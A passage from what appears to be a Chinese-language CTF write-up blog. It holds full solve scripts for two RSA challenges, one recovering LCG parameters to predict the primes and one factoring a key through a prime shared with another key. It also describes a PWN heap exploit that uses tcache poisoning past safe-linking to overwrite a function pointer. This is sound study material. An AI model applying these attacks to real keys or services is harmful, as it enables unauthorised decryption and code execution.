class=\"wp-block-list\">\n<li>\u9898\u76ee\u4f7f\u7528\u4e86\u4e00\u4e2a\u7ebf\u6027\u540c\u4f59\u751f\u6210\u5668 <code>LCG<\/code>\u3002<\/li>\n\n\n\n<li>\u5148\u6cc4\u9732\u4e86\u8fde\u7eed\u7684 <code>10<\/code> \u4e2a\u72b6\u6001\u503c <code>leak<\/code>\u3002<\/li>\n\n\n\n<li>\u7136\u540e\u7b2c <code>11<\/code>\u3001<code>12<\/code> \u4e2a\u72b6\u6001\u5206\u522b\u7ecf\u8fc7 <code>next_prime<\/code> \u53d8\u6210 <code>p<\/code> \u548c <code>q<\/code>\u3002<\/li>\n\n\n\n<li>\u6700\u7ec8\u7528\u6807\u51c6 <code>RSA<\/code> \u8fdb\u884c\u52a0\u5bc6\u3002<\/li>\n<\/ol>\n\n\n\n<p class=\"wp-block-paragraph\">\u8fd9\u610f\u5473\u7740\uff1a<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li><code>RSA<\/code> \u672c\u8eab\u5e76\u6ca1\u6709\u660e\u663e\u5f31\u70b9\uff1b<\/li>\n\n\n\n<li>\u771f\u6b63\u7684\u6f0f\u6d1e\u5728\u4e8e <code>p<\/code>\u3001<code>q<\/code> \u7684\u6765\u6e90\u662f\u53ef\u9884\u6d4b\u7684\uff1b<\/li>\n\n\n\n<li>\u53ea\u8981\u4ece\u6cc4\u9732\u4e2d\u6062\u590d\u51fa <code>LCG<\/code> \u53c2\u6570\uff0c\u5c31\u80fd\u7ee7\u7eed\u5f80\u540e\u63a8\u72b6\u6001\uff0c\u8fdb\u800c\u6062\u590d <code>p<\/code> \u548c <code>q<\/code>\u3002<\/li>\n<\/ul>\n\n\n\n<p class=\"wp-block-paragraph\">\u6362\u53e5\u8bdd\u8bf4\uff0c\u8fd9\u9898\u7684\u672c\u8d28\u4e0d\u662f\u201c\u7206\u7834 RSA\u201d\uff0c\u800c\u662f\u201c\u9884\u6d4b\u751f\u6210 RSA \u7d20\u6570\u7684\u968f\u673a\u6e90\u201d\u3002<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h4 class=\"wp-block-heading\" id=\"lcg-\u57fa\u7840\">LCG \u57fa\u7840<\/h4>\n\n\n\n<p class=\"wp-block-paragraph\">\u7ebf\u6027\u540c\u4f59\u751f\u6210\u5668\u5f62\u5f0f\u4e3a\uff1a x_{n+1} = (a x_n + b) mod m<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u5176\u4e2d\uff1a<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li><code>m<\/code> \u662f\u6a21\u6570<\/li>\n\n\n\n<li><code>a<\/code> \u662f\u4e58\u5b50<\/li>\n\n\n\n<li><code>b<\/code> \u662f\u589e\u91cf<\/li>\n\n\n\n<li><code>x_0<\/code> 
\u662f\u79cd\u5b50<\/li>\n<\/ul>\n\n\n\n<p class=\"wp-block-paragraph\">\u5982\u679c <code>m, a, b, seed<\/code> \u90fd\u4fdd\u5bc6\uff0cLCG \u8868\u9762\u4e0a\u50cf\u662f\u201c\u968f\u673a\u201d\u7684\uff1b\u4f46\u4e00\u65e6\u8fde\u7eed\u8f93\u51fa\u6cc4\u9732\u8db3\u591f\u591a\uff0c\u53c2\u6570\u5f80\u5f80\u53ef\u4ee5\u76f4\u63a5\u6062\u590d\u3002<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u8fd9\u6b63\u662f LCG \u5728\u5bc6\u7801\u5b66\u91cc\u4e0d\u5b89\u5168\u7684\u6839\u672c\u539f\u56e0\uff1a\u5b83\u9002\u5408\u505a\u6a21\u62df\u3001\u62bd\u6837\u3001\u6e38\u620f\u903b\u8f91\uff0c\u4e0d\u9002\u5408\u751f\u6210\u5bc6\u94a5\u6750\u6599\u3002<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h4 class=\"wp-block-heading\" id=\"\u653b\u51fb\u5207\u5165\u70b9\">\u653b\u51fb\u5207\u5165\u70b9<\/h4>\n\n\n\n<p class=\"wp-block-paragraph\">\u5df2\u77e5\u8fde\u7eed\u8f93\u51fa\uff1a<code>x0, x1, x2, ..., x9<\/code><\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u5b9a\u4e49\u5dee\u5206\uff1a <code>d_i = x_{i+1} - x_i<\/code><\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u5bf9\u4e8e LCG\uff0c\u53ef\u4ee5\u63a8\u51fa\u4e00\u4e2a\u975e\u5e38\u5173\u952e\u7684\u6052\u7b49\u5f0f\uff1a <code>d_{i+2} d_i - d_{i+1}^2 \u2261 0 (mod m)<\/code><\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u4e5f\u5c31\u662f\u8bf4\uff0c\u4e0b\u9762\u8fd9\u4e9b\u503c\uff1a <code>t_i = d_{i+2} d_i - d_{i+1}^2<\/code><\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u5168\u90e8\u90fd\u662f <code>m<\/code> \u7684\u500d\u6570\u3002<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u4e8e\u662f\u6211\u4eec\u53ef\u4ee5\uff1a<\/p>\n\n\n\n<ol class=\"wp-block-list\">\n<li>\u5148\u7b97\u51fa\u82e5\u5e72\u4e2a <code>t_i<\/code><\/li>\n\n\n\n<li>\u5bf9\u5b83\u4eec\u53d6 <code>gcd<\/code><\/li>\n\n\n\n<li>\u5927\u6982\u7387\u76f4\u63a5\u5f97\u5230\u6a21\u6570 <code>m<\/code><\/li>\n<\/ol>\n\n\n\n<p class=\"wp-block-paragraph\">\u8fd9\u662f\u6062\u590d\u672a\u77e5 LCG 
\u6a21\u6570\u65f6\u7684\u7ecf\u5178\u505a\u6cd5\u3002<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h4 class=\"wp-block-heading\" id=\"\u7b2c\u4e00\u6b65-\u6062\u590d\u6a21\u6570-m\">\u7b2c\u4e00\u6b65\uff1a\u6062\u590d\u6a21\u6570 <code>m<\/code><\/h4>\n\n\n\n<p class=\"wp-block-paragraph\">\u8bbe\uff1a <code>d_i = x_{i+1} - x_i<\/code><\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u7136\u540e\u8ba1\u7b97\uff1a <code>t_i = |d_{i+2} d_i - d_{i+1}^2|<\/code><\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u518d\u53d6\uff1a m = gcd(t_0, t_1, t_2, \u2026)<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u5728\u672c\u9898\u4e2d\uff0c\u5f97\u5230\uff1a <code>m = 7875284624774766146779800993774894905100411788121896560125060768418290671778891426069143518962622717768183611843647982948139027846154094539521976137200947<\/code><\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u8fd9\u662f\u4e00\u4e2a <code>512<\/code> \u4f4d\u6574\u6570\uff0c\u548c\u9898\u76ee\u89c4\u6a21\u5b8c\u5168\u5339\u914d\u3002<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h4 class=\"wp-block-heading\" id=\"\u7b2c\u4e8c\u6b65-\u6062\u590d-a-\u548c-b\">\u7b2c\u4e8c\u6b65\uff1a\u6062\u590d <code>a<\/code> \u548c <code>b<\/code><\/h4>\n\n\n\n<p class=\"wp-block-paragraph\">LCG \u6ee1\u8db3\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>    x2 \u2261 a x1 + b (mod m)\n    x1 \u2261 a x0 + b (mod m)<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">\u4e24\u5f0f\u76f8\u51cf\uff1a<code>x2 - x1 \u2261 a(x1 - x0) (mod m)<\/code><\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u4e8e\u662f\uff1a <code>a \u2261 (x2 - x1) * (x1 - x0)^{-1} (mod m)<\/code><\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u53ea\u8981 <code>x1 - x0<\/code> \u5728\u6a21 <code>m<\/code> \u4e0b\u53ef\u9006\uff0c\u5c31\u80fd\u6c42\u51fa <code>a<\/code>\u3002\u7136\u540e\u518d\u4ee3\u56de\uff1a b \u2261 x1 &#8211; a x0 (mod m)<\/p>\n\n\n\n<p 
class=\"wp-block-paragraph\">\u672c\u9898\u6062\u590d\u5f97\u5230\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>    a = 4738825074520259956533037190684495177771755298763050091909140649381629606721221195682239040738122274360279582713489062229369777696853175440320242347711942\n    b = 4092912681671128018391178676001917712732854554289857666213004128629748648943621665932967507890089418337577391833454547542549491970398245151364856305238733<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">\u9a8c\u8bc1\u6240\u6709\u6cc4\u9732\u503c\u90fd\u6ee1\u8db3\u9012\u63a8\u5173\u7cfb\uff0c\u8bf4\u660e\u6062\u590d\u6210\u529f\u3002<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h4 class=\"wp-block-heading\" id=\"\u7b2c\u4e09\u6b65-\u9884\u6d4b\u540e\u7eed\u72b6\u6001\">\u7b2c\u4e09\u6b65\uff1a\u9884\u6d4b\u540e\u7eed\u72b6\u6001<\/h4>\n\n\n\n<p class=\"wp-block-paragraph\">\u5df2\u77e5\u6700\u540e\u4e00\u4e2a\u6cc4\u9732\u503c <code>x9<\/code>\uff0c\u7ee7\u7eed\u9012\u63a8\uff1a<code>x10 = (a x9 + b) mod m<\/code>\uff0c<code>x11 = (a x10 + b) mod m<\/code><\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u9898\u76ee\u4e2d\u8fd9\u4e24\u4e2a\u503c\u4e0d\u662f\u76f4\u63a5\u4f5c\u4e3a\u7d20\u6570\uff0c\u800c\u662f\uff1a<code>p = next_prime(x10)<\/code>\uff0c<code>q = next_prime(x11)<\/code><\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u6240\u4ee5\u53ea\u8981\u7ee7\u7eed\u7b97\uff1a<code>from sympy import nextprime<\/code>\uff0c<code>p = nextprime(x10)<\/code>\uff0c<code>q = nextprime(x11)<\/code><\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u5c31\u80fd\u5f97\u5230\u771f\u6b63\u7684 <code>RSA<\/code> \u7d20\u6570\u3002<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u672c\u9898\u9a8c\u8bc1\u7ed3\u679c\uff1a<code>p * q == n<\/code><\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u6210\u7acb\uff0c\u8bf4\u660e <code>p<\/code>\u3001<code>q<\/code> \u5df2\u7ecf\u5b8c\u5168\u6062\u590d\u3002<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h4 class=\"wp-block-heading\" 
id=\"\u7b2c\u56db\u6b65-\u5206\u89e3-rsa-\u5e76\u89e3\u5bc6\">\u7b2c\u56db\u6b65\uff1a\u5206\u89e3 RSA \u5e76\u89e3\u5bc6<\/h4>\n\n\n\n<p class=\"wp-block-paragraph\">\u65e2\u7136\u5df2\u7ecf\u62ff\u5230\u4e86 <code>p<\/code> \u548c <code>q<\/code>\uff0c\u63a5\u4e0b\u6765\u5c31\u662f\u6807\u51c6 RSA \u6d41\u7a0b\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>    phi(n) = (p - 1)(q - 1)\n    d = e^{-1} mod phi(n)\n    m = c^d mod n<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">\u518d\u628a\u6574\u6570\u8f6c\u56de\u5b57\u8282\u4e32\u5373\u53ef\uff1a flag = long_to_bytes(m)<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u6700\u7ec8\u5f97\u5230\uff1a LHFLAG{lcg_rsa_predictor_9f3a1c7e5b2d}<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h4 class=\"wp-block-heading\" id=\"\u5b8c\u6574\u5229\u7528\u811a\u672c\">\u5b8c\u6574\u5229\u7528\u811a\u672c<\/h4>\n\n\n\n<p class=\"wp-block-paragraph\">\u4e0b\u9762\u7ed9\u51fa\u672c\u9898\u7684\u5b8c\u6574\u6c42\u89e3\u811a\u672c\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code has-small-font-size\"><code>    from math import gcd\n    from functools import reduce\n    from sympy import nextprime\n    leak = &#91;\n        6985834086318513464582066760726949209670289780223924014189989314148020303714444205927413118671751493130743545190688298414543409085873510552656160506576256,\n        7282244412157875114308857740823652350341058188147469510808059192495360119191350036395015555471478559653925696086169517452309653330835642916888429465946211,\n        1002794114231128166816211135173410428216376972195397080313080012455988792692246515131492377985052655981575303475686765019210608716329061049962560828575363,\n        4477586192351759281760189220444819326589815568129221564121474666910601526393095724102777606325270387078962182371925781406702466696126872911917082111763043,\n        
7322401749672927612275807633951831167111798827239752438748033792428144120871451046550505356056106291710791287610345186486997678338441869459415730747675848,\n        2453956094979835874287873434326477980661206136156942064592927844371687317510373129480180598842006452582062065904520211202668029697652843050740610127468086,\n        2740326586334566990787059605091870695062095329281857614935719484632956517014105314443239608159562804443460738565005726448350650224717812760949150171988534,\n        7585912819061763422117137229921075196465007521972780322503074449789602179953142181941295151842340199137511389403983042099433633144876922274802342307610422,\n        7315097688998032920087172453751035970700135831450471495603601439092292775843751317667155675236178109105737193209581466895128278458155386362803044961601480,\n        5997245726016350747947482111615966538840537804797068568851188109453752358541419295057794060476720587261258477381314231836964496783204739144606342473368443,\n    ]\n\n    n = 3457493176653935744329250989656750649327040804724658025768062867871700661799411336877305218669630736803860520092210770056572178058772166797062129524483539658137438065055112442175180768844050391404760307986176923967153987260311979398106896242548808983076228626704805648986994671173890832635179299147368481691\n    e = 65537\n    c = 1000647187097524621492135399992688567047890488977091487164941638610113163790388892932241499775799331256098676902803986758100100914983164467593532755127812962760275620307263921120028436805324458699970081490155784536893678338378009059929582417188211114450310835552298348248596105560838812370161012099089613190\n\n\n    def egcd(a, b):\n        if b == 0:\n            return a, 1, 0\n        g, x1, y1 = egcd(b, a % b)\n        return g, y1, x1 - (a \/\/ b) * y1\n\n\n    def inv(a, m):\n        g, x, _ = egcd(a, m)\n        if g != 1:\n            raise ValueError(\"inverse does not exist\")\n        return x % m\n\n\n    ds = &#91;leak&#91;i + 1] - leak&#91;i] for 
i in range(len(leak) - 1)]\n    ts = &#91;abs(ds&#91;i + 2] * ds&#91;i] - ds&#91;i + 1] * ds&#91;i + 1]) for i in range(len(ds) - 2)]\n    m = reduce(gcd, ts)\n\n    a = ((leak&#91;2] - leak&#91;1]) * inv(leak&#91;1] - leak&#91;0], m)) % m\n    b = (leak&#91;1] - a * leak&#91;0]) % m\n\n    x10 = (a * leak&#91;-1] + b) % m\n    x11 = (a * x10 + b) % m\n\n    p = int(nextprime(x10))\n    q = int(nextprime(x11))\n    assert p * q == n\n\n    phi = (p - 1) * (q - 1)\n    d = pow(e, -1, phi)\n    msg = pow(c, d, n)\n\n    flag = msg.to_bytes((msg.bit_length() + 7) \/\/ 8, \"big\")\n    print(flag.decode())<\/code><\/pre>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h4 class=\"wp-block-heading\" id=\"\u89e3\u9898\u601d\u8def\u7684\u5173\u952e\u7f8e\u611f\">\u89e3\u9898\u601d\u8def\u7684\u5173\u952e\u7f8e\u611f<\/h4>\n\n\n\n<p class=\"wp-block-paragraph\">\u8fd9\u9898\u6700\u6709\u610f\u601d\u7684\u5730\u65b9\uff0c\u4e0d\u5728\u4e8e\u516c\u5f0f\u6709\u591a\u96be\uff0c\u800c\u5728\u4e8e\u7ed3\u6784\u5f88\u987a\uff1a<\/p>\n\n\n\n<ol class=\"wp-block-list\">\n<li><code>LCG<\/code> \u672c\u8eab\u4e0d\u5b89\u5168\u3002<\/li>\n\n\n\n<li>\u8c03\u8bd5\u8f93\u51fa\u628a\u8fde\u7eed\u5185\u90e8\u72b6\u6001\u66b4\u9732\u4e86\u51fa\u6765\u3002<\/li>\n\n\n\n<li>\u8fde\u7eed\u72b6\u6001\u8db3\u591f\u6062\u590d\u968f\u673a\u6e90\u53c2\u6570\u3002<\/li>\n\n\n\n<li>\u968f\u673a\u6e90\u53c8\u76f4\u63a5\u53c2\u4e0e <code>RSA<\/code> \u7d20\u6570\u751f\u6210\u3002<\/li>\n\n\n\n<li>\u4e00\u65e6\u80fd\u9884\u6d4b\u540e\u7eed\u72b6\u6001\uff0c<code>RSA<\/code> \u7684\u201c\u4e0d\u53ef\u5206\u89e3\u6027\u201d\u5c31\u4e0d\u518d\u6210\u7acb\u3002<\/li>\n<\/ol>\n\n\n\n<p class=\"wp-block-paragraph\">\u5b83\u4e0d\u662f\u5355\u70b9\u5931\u8bef\uff0c\u800c\u662f\u201c\u5f31\u968f\u673a + \u8c03\u8bd5\u6cc4\u9732 + \u5bc6\u94a5\u751f\u6210\u4f9d\u8d56\u4f2a\u968f\u673a\u201d\u7684\u94fe\u5f0f\u5d29\u584c\u3002<\/p>\n\n\n\n<p 
class=\"wp-block-paragraph\">\u8fd9\u7c7b\u9898\u5f88\u503c\u5f97\u8bb0\u4f4f\uff0c\u56e0\u4e3a\u771f\u5b9e\u573a\u666f\u91cc\uff0c\u5f88\u591a\u5bc6\u7801\u7cfb\u7edf\u5e76\u4e0d\u662f\u7b97\u6cd5\u672c\u8eab\u9519\u4e86\uff0c\u800c\u662f\uff1a<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>\u968f\u673a\u6570\u4e0d\u591f\u968f\u673a\uff1b<\/li>\n\n\n\n<li>\u5185\u90e8\u72b6\u6001\u88ab\u65e5\u5fd7\u3001\u62a5\u9519\u3001\u8c03\u8bd5\u4fe1\u606f\u5e26\u51fa\u6765\uff1b<\/li>\n\n\n\n<li>\u5bc6\u94a5\u751f\u6210\u8def\u5f84\u548c\u5f31\u71b5\u6e90\u7ed1\u5b9a\u5f97\u592a\u7d27\u3002<\/li>\n<\/ul>\n\n\n\n<p class=\"wp-block-paragraph\">\u7b97\u6cd5\u6ca1\u6709\u5012\u4e0b\uff0c\u5de5\u7a0b\u5b9e\u73b0\u5148\u5012\u4e0b\u4e86\u3002<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h4 class=\"wp-block-heading\" id=\"\u590d\u76d8\u603b\u7ed3\">\u590d\u76d8\u603b\u7ed3<\/h4>\n\n\n\n<p class=\"wp-block-paragraph\">\u8fd9\u9898\u7684\u6838\u5fc3\u7ed3\u8bba\u53ef\u4ee5\u538b\u7f29\u6210\u4e00\u53e5\u8bdd\uff1a<\/p>\n\n\n\n<blockquote class=\"wp-block-quote is-layout-flow wp-block-quote-is-layout-flow\">\n<p class=\"wp-block-paragraph\">\u5f53 RSA \u7684\u7d20\u6570\u6765\u6e90\u53ef\u9884\u6d4b\u65f6\uff0c\u653b\u51fb\u8005\u6253\u7684\u5c31\u4e0d\u662f RSA\uff0c\u800c\u662f\u201c\u751f\u6210 RSA \u7684\u90a3\u53f0\u968f\u673a\u673a\u5668\u201d\u3002<\/p>\n<\/blockquote>\n\n\n\n<p class=\"wp-block-paragraph\">\u9700\u8981\u8bb0\u4f4f\u7684\u77e5\u8bc6\u70b9\uff1a<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>\u8fde\u7eed LCG \u8f93\u51fa\u53ef\u6062\u590d\u6a21\u6570 <code>m<\/code><\/li>\n\n\n\n<li>\u518d\u7531\u540c\u4f59\u5173\u7cfb\u6062\u590d <code>a<\/code>\u3001<code>b<\/code><\/li>\n\n\n\n<li>\u6709\u4e86\u53c2\u6570\u5c31\u80fd\u7ee7\u7eed\u9884\u6d4b\u540e\u7eed\u72b6\u6001<\/li>\n\n\n\n<li><code>next_prime<\/code> 
\u4e0d\u4f1a\u63d0\u5347\u968f\u673a\u6027\uff0c\u53ea\u4f1a\u628a\u201c\u53ef\u9884\u6d4b\u6574\u6570\u201d\u53d8\u6210\u201c\u53ef\u9884\u6d4b\u7d20\u6570\u201d<\/li>\n\n\n\n<li>\u4e00\u65e6 <code>p<\/code>\u3001<code>q<\/code> \u53ef\u9884\u6d4b\uff0cRSA \u76f4\u63a5\u5931\u5b88<\/li>\n<\/ul>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h4 class=\"wp-block-heading\" id=\"\u6700\u7ec8-flag\">\u6700\u7ec8 Flag<\/h4>\n\n\n\n<pre class=\"wp-block-code\"><code>LHFLAG{lcg_rsa_predictor_9f3a1c7e5b2d}<\/code><\/pre>\n\n\n\n<h3 class=\"wp-block-heading\" id=\"\u7b80\u5355\u7684rsa\">\u7b80\u5355\u7684RSA<\/h3>\n\n\n\n<blockquote class=\"wp-block-quote is-layout-flow wp-block-quote-is-layout-flow\">\n<p class=\"wp-block-paragraph\">\u6211\u6279\u91cf\u751f\u6210\u4e86\u5f88\u591a RSA \u516c\u94a5\uff0c\u5e76\u7528\u5176\u4e2d\u4e00\u4e2a\u516c\u94a5\u52a0\u5bc6\u4e86 flag\u3002<\/p>\n<\/blockquote>\n\n\n\n<p class=\"wp-block-paragraph\">10 \u4e2a RSA \u516c\u94a5 (e=65537)\uff0c\u5bc6\u6587\u7531 key04 \u52a0\u5bc6\u3002\u8ba1\u7b97 key04 \u7684 n \u4e0e\u5176\u4f59 n \u7684 GCD\uff0c\u53d1\u73b0\u4e0e key07 \u5171\u4eab\u7d20\u6570\u56e0\u5b50\uff0c\u4ece\u800c\u5206\u89e3\u6a21\u6570\u3001\u6062\u590d\u79c1\u94a5\u3001\u89e3\u5bc6\u5bc6\u6587\u3002<\/p>\n\n\n\n<h4 class=\"wp-block-heading\" id=\"1-gcd-\u5206\u6790\">1: GCD \u5206\u6790<\/h4>\n\n\n\n<p class=\"wp-block-paragraph\">\u9898\u76ee\u7ed9\u51fa 10 \u4e2a RSA \u516c\u94a5\uff0c\u6240\u6709 e=65537\u3002\u82e5\u4efb\u610f\u4e24\u4e2a\u6a21\u6570\u5171\u4eab\u7d20\u6570\u56e0\u5b50 p\uff0c\u5219 <code>gcd(n_i, n_j) = p<\/code> \u53ef\u76f4\u63a5\u5206\u89e3\u4e24\u8005\u3002<\/p>\n\n\n\n<pre class=\"wp-block-code has-small-font-size\"><code>    import json\n    from math import gcd\n\n    with open('public_keys.json') as f:\n        keys = json.load(f)\n\n    ns = {k&#91;'id']: int(k&#91;'n'], 16) for k in keys}\n    n_target = ns&#91;'key04']\n    e = 65537\n\n    # gcd(key04, 
key07) \u5f97\u5230\u5171\u4eab\u56e0\u5b50\n    for kid, n in ns.items():\n        if kid == 'key04':\n            continue\n        g = gcd(n_target, n)\n        if g &gt; 1:\n            p = g\n            q = n_target \/\/ p\n            print(f\"Shared factor with {kid}: p = {p}\")\n            break\n\n    # \u8ba1\u7b97\u79c1\u94a5\u5e76\u89e3\u5bc6\n    phi = (p - 1) * (q - 1)\n    d = pow(e, -1, phi)\n\n    ciphertext = 0x6eb35a92f4e81124a404a3b4690465ca03c2659db76b3bd62dc294215feb1e23f6d2514f7770c44ffaf474024a3ad2b760167ac208dfc0228b69929ee5daf0632183cdc3e4e62d19872ba6aa161cde4726adf30c1b53b56d82c2a86e80842f29c904f1f5da0dd7b9db5797dad06219ed0ad2241a45de5bcac18772004668e4e3\n\n    m = pow(ciphertext, d, n_target)\n    flag = m.to_bytes((m.bit_length() + 7) \/\/ 8, 'big').decode()\n    print(flag)<\/code><\/pre>\n\n\n\n<h4 class=\"wp-block-heading\" id=\"\u5f97\u5230flag\">\u5f97\u5230Flag<\/h4>\n\n\n\n<pre class=\"wp-block-code\"><code>LHFLAG{GCD_RSA_SHARED_PRIME_9f3a2c}<\/code><\/pre>\n\n\n\n<h2 class=\"wp-block-heading\" id=\"pwn\">PWN<\/h2>\n\n\n\n<h3 class=\"wp-block-heading\" id=\"\u83dc\u5355\u5f88\u7f8e\u5473\">\u83dc\u5355\u5f88\u7f8e\u5473<\/h3>\n\n\n\n<blockquote class=\"wp-block-quote is-layout-flow wp-block-quote-is-layout-flow\">\n<p class=\"wp-block-paragraph\">\u6e2f\u53e3\u7684\u8001\u65e7\u8d27\u8fd0\u6253\u5305\u7cfb\u7edf\u6700\u8fd1\u521a\u4ece\u7eb8\u8d28\u53f0\u8d26\u8fc1\u5230\u7ec8\u7aef\u670d\u52a1\uff0c\u4f46\u8d1f\u8d23\u8fc1\u79fb\u7684\u627f\u5305\u5546\u663e\u7136\u6ca1\u628a\u5185\u5b58\u5b89\u5168\u5f53\u56de\u4e8b\u3002\u4f60\u62ff\u5230\u4e86\u4e00\u4efd\u7528\u4e8e\u7ba1\u7406\u8d27\u8fd0\u6e05\u5355\u7684\u4e8c\u8fdb\u5236\u670d\u52a1\uff0c\u73b0\u573a\u73af\u5883\u53ea\u5f00\u653e\u4e86\u4e00\u4e2a TCP \u7aef\u53e3\uff0c\u7ba1\u7406\u5458\u58f0\u79f0\u201c\u83dc\u5355\u5f88\u7b80\u5355\uff0c\u6309\u63d0\u793a\u64cd\u4f5c\u5c31\u597d\u201d\u3002 
\u4f60\u7684\u76ee\u6807\u662f\u5ba1\u8ba1\u8fd9\u4e2a\u83dc\u5355\u9a71\u52a8\u7a0b\u5e8f\uff0c\u627e\u51fa\u5176\u4e2d\u7684\u5185\u5b58\u7ba1\u7406\u7f3a\u9677\uff0c\u5e76\u6700\u7ec8\u83b7\u53d6\u670d\u52a1\u7aef\u7684 flag\u3002<\/p>\n<\/blockquote>\n\n\n\n<p class=\"wp-block-paragraph\">Harbor Packer \u662f\u4e00\u4e2a\u8d27\u8fd0\u6e05\u5355\u7ba1\u7406\u4e8c\u8fdb\u5236\u7a0b\u5e8f\uff08x86-64, Full RELRO, No Canary, No PIE\uff09\u3002<code>repack_cargo<\/code> \u51fd\u6570\u5728\u8ba1\u7b97\u65b0 manifest \u5927\u5c0f\u65f6\u5c06 <code>segments * 32<\/code> \u622a\u65ad\u4e3a\u4f4e 8 \u4f4d\u4f20\u7ed9 <code>malloc()<\/code>\uff0c\u4f46 <code>read_exact()<\/code> \u4f7f\u7528\u5b8c\u6574\u503c\u8bfb\u53d6\u6570\u636e\uff0c\u5bfc\u81f4\u5806\u6ea2\u51fa\u3002\u5229\u7528\u6ea2\u51fa\u8fdb\u884c tcache poisoning\uff08\u7ed5\u8fc7 safe-linking\uff09\uff0c\u8986\u5199\u51fd\u6570\u6307\u9488\u4e3a <code>win<\/code> \u5730\u5740\u83b7\u53d6 flag\u3002<\/p>\n\n\n\n<h4 class=\"wp-block-heading\" id=\"1-\u6f0f\u6d1e\u5b9a\u4f4d\">1: \u6f0f\u6d1e\u5b9a\u4f4d<\/h4>\n\n\n\n<p class=\"wp-block-paragraph\"><code>repack_cargo<\/code> \u4e2d <code>repack<\/code> \u8c03\u7528 <code>malloc(low_byte)<\/code> \u5206\u914d\u65b0 manifest\uff0c\u968f\u540e <code>read_exact(ptr, segments * 32)<\/code> \u5199\u5165\u5b8c\u6574\u6570\u636e\uff1a segments=9 \u2192 9*32=288=0x120, low_byte=0x20 \u2192 malloc(0x20) \u2192 0x30 chunk, \u4f46\u8bfb\u5165 288 \u5b57\u8282<\/p>\n\n\n\n<h4 class=\"wp-block-heading\" id=\"2-heap-leak-tcache-\u5e03\u5c40\">2: Heap Leak + Tcache \u5e03\u5c40<\/h4>\n\n\n\n<p class=\"wp-block-paragraph\">\u901a\u8fc7 <code>inspect<\/code> \u6cc4\u9732 manifest \u5806\u5730\u5740\u3002\u521b\u5efa\u5e76 scrap \u4e24\u4e2a size=0x20 \u7684 slot\uff0c\u4f7f 4 \u4e2a 0x30 chunk \u8fdb\u5165 tcache idx 1\u3002\u4fdd\u7559\u4e00\u4e2a slot 0 \u4f9b repack \u89e6\u53d1\u6ea2\u51fa\u3002<\/p>\n\n\n\n<h4 class=\"wp-block-heading\" id=\"3-safe-linking-\u7ed5\u8fc7\">3: 
Safe-linking \u7ed5\u8fc7<\/h4>\n\n\n\n<p class=\"wp-block-paragraph\">glibc 2.38 \u5b89\u5168\u94fe\u63a5\u4fdd\u62a4\uff1a<code>stored_fd = target ^ (chunk_addr &gt;&gt; 12)<\/code>\u3002\u4f7f\u7528\u6cc4\u9732\u7684\u5806\u5730\u5740\u8ba1\u7b97\u6b63\u786e\u7684 mangled fd\uff0c\u8986\u5199 tcache \u4e2d\u88ab free chunk \u7684 fd \u6307\u9488\u6307\u5411 BSS \u4e2d\u7684\u51fd\u6570\u6307\u9488\u533a\u57df <code>0x404020<\/code>\u3002<\/p>\n\n\n\n<h4 class=\"wp-block-heading\" id=\"4-arbitrary-write-win\">4: Arbitrary Write + Win<\/h4>\n\n\n\n<p class=\"wp-block-paragraph\">\u8fde\u7eed\u4e24\u6b21 <code>malloc(0x20)<\/code>\uff1a\u7b2c\u4e00\u6b21\u5f39\u51fa\u6b63\u5e38 chunk\uff0c\u7b2c\u4e8c\u6b21\u5f39\u51fa\u88ab\u6c61\u67d3\u7684 <code>0x404020<\/code>\u3002<code>read_exact<\/code> \u5c06 <code>win<\/code> \u5730\u5740 <code>0x401c35<\/code> \u5199\u5165\u51fd\u6570\u6307\u9488\u3002\u83dc\u5355\u9009\u9879 5\uff08Exit\uff09\u95f4\u63a5\u8c03\u7528\u88ab\u8986\u5199\u7684\u51fd\u6570\u6307\u9488 \u2192 <code>win()<\/code> \u2192 \u6253\u5370 <code>\/flag<\/code>\u3002<\/p>\n\n\n\n<pre class=\"wp-block-code has-small-font-size\"><code>    from pwn import *\n    